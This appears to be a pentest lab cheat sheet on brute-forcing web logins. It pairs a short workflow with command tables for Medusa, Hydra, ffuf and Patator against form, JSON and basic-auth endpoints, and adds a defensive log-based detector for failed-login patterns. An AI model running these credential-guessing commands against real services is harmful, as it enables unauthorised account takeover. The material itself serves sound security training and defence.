Bruteforcing
Bruteforcing is used to test credentials until we find valid ones.
Workflow
- Identify login endpoints: /login, /auth, /signin
- Analyze responses:
  - Check if it returns different error messages depending on whether the user exists or not.
  - Check response time differences depending on whether the user exists or not.
- Inspect cookies, sessions, etc.
- Verify if protections exist: MFA, Captcha, Rate Limiting, Account Lockout.
- Check default credentials.
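
Added example, not part of the original page: a defender-side check that the rate limiting and account lockout listed above would trigger, separating the one-user and user-list patterns that the tool tables below generate. The log format, threshold, window and all names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed application auth-log format: "<UTC timestamp> <event> user=<name> ip=<addr>"
LINE_RE = re.compile(r"^(\S+) (login_failed|login_ok) user=(\S+) ip=(\S+)$")

def parse(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # ignore lines that are not auth events
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3), m.group(4)

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Map ("ip"|"user", value) -> pattern once `threshold` failures fall inside `window`."""
    by_ip = defaultdict(deque)    # ip   -> recent (timestamp, user) failures
    by_user = defaultdict(deque)  # user -> recent (timestamp, ip) failures
    alerts = {}
    for ev in filter(None, map(parse, lines)):
        ts, event, user, ip = ev
        if event != "login_failed":
            continue
        for q, item in ((by_ip[ip], (ts, user)), (by_user[user], (ts, ip))):
            q.append(item)
            while ts - q[0][0] > window:  # slide the window forward
                q.popleft()
        if len(by_ip[ip]) >= threshold:  # candidate for per-source rate limiting
            users = {u for _, u in by_ip[ip]}
            alerts[("ip", ip)] = "one account, many passwords" if len(users) == 1 else "many accounts"
        sources = {i for _, i in by_user[user]}
        if len(by_user[user]) >= threshold and len(sources) > 1:  # candidate for account lockout
            alerts[("user", user)] = "one account, many sources"
    return alerts

def sample_log():
    """Constructed events for illustration, not real traffic."""
    t = "2024-03-12T10:00:%02dZ"
    log = [t % s + " login_failed user=admin ip=203.0.113.7" for s in range(0, 12, 2)]
    log += [t % (20 + n) + f" login_failed user={u} ip=198.51.100.9"
            for n, u in enumerate(["alice", "bob", "carol", "dave", "erin"])]
    log += [t % (40 + n) + f" login_failed user=root ip=192.0.2.{n + 1}" for n in range(5)]
    log += [t % 50 + " login_failed user=jane ip=198.51.100.200",
            t % 52 + " login_ok user=jane ip=198.51.100.200"]
    return log

if __name__ == "__main__":
    for key, pattern in detect(sample_log()).items():
        print(key, pattern)
```

A source that stays under the per-IP threshold by spreading attempts across addresses is only caught by the per-account counter, which is why both are kept.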
Medusa
| Command | Description |
|---|---|
| `medusa -h target.hmv -u admin -P passwords.txt -M http` | Basic GET bruteforce |
| `medusa -h target.hmv -U users.txt -P passwords.txt -M http` | Users + passwords |
| `medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http` | Threads |
| `medusa -h target.hmv -u admin -P passwords.txt -M https` | HTTPS |
| `medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php?user=^USER^&pass=^PASS^:F=Invalid"` | Basic GET in URL |
| `medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:username=^USER^&password=^PASS^:F=Invalid"` | Basic POST bruteforce |
| `medusa -h target.hmv -U users.txt -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Login failed"` | Basic POST bruteforce with multiple users |
| `medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:S=Welcome"` | Detect success by string |
| `medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | Detect failure + threads |
| `medusa -h target.com -u admin -P passwords.txt -M http -m FORM:"/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error"` | Basic JSON |
Hydra
| Command | Description |
|---|---|
| `hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | POST bruteforce |
| `hydra -L users.txt -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | Users + passwords bruteforce |
| `hydra -l admin -P passwords.txt target.hmv http-get-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | GET bruteforce |
| `hydra -l admin -P passwords.txt target.hmv https-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | HTTPS bruteforce |
| `hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:S=Welcome"` | Detect "Welcome" as success |
| `hydra -l admin -P passwords.txt -t 16 -V target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | Verbose + threads |
| `hydra -l admin -P passwords.txt target.hmv http-post-json "/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error"` | JSON API bruteforce |
| `hydra -L usernames.txt -P passwords.txt www.target.hmv http-get` | Basic GET auth |
| `hydra -l admin -P passwords.txt target.hmv http-get / -s 1337` | Basic auth on custom port |
| `hydra -l admin -P passwords.txt target.hmv http-post-form "/login:user=^USER^&pass=^PASS^:S=302"` | Web Login Form |
Ffuf
| Command | Description |
|---|---|
| `ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fr "Invalid"` | Password bruteforce |
| `ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=1234" -w users.txt -fr "Invalid"` | Username bruteforce |
| `ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=FUZ2Z" -w users.txt:FUZZ -w passwords.txt:FUZ2Z` | User/password bruteforce |
| `ffuf -u http://target.hmv/api/login -X POST -H "Content-Type: application/json" -d '{"user":"admin","pass":"FUZZ"}' -w passwords.txt -fr "error"` | JSON API bruteforce |
| `ffuf -u "http://target.hmv/login?user=admin&pass=FUZZ" -w passwords.txt -fr "Invalid"` | GET bruteforce |
| `ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -mc 200` | Filter by HTTP code |
| `ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fs 1234` | Filter by response size |
Patator
| Command | Description |
|---|---|
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:fgrep='Invalid'` | Basic POST |
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt` | User + password |
| `patator http_fuzz method=GET url='http://target.com/login?user=admin&pass=FILE0' 0=passwords.txt` | GET |
| `patator http_fuzz url=http://target.hmv/api/login method=POST header='Content-Type: application/json' body='{"user":"admin","pass":"FILE0"}' 0=passwords.txt` | JSON |
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:code=401` | Filter by HTTP code |
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -t 10` | Use 10 threads |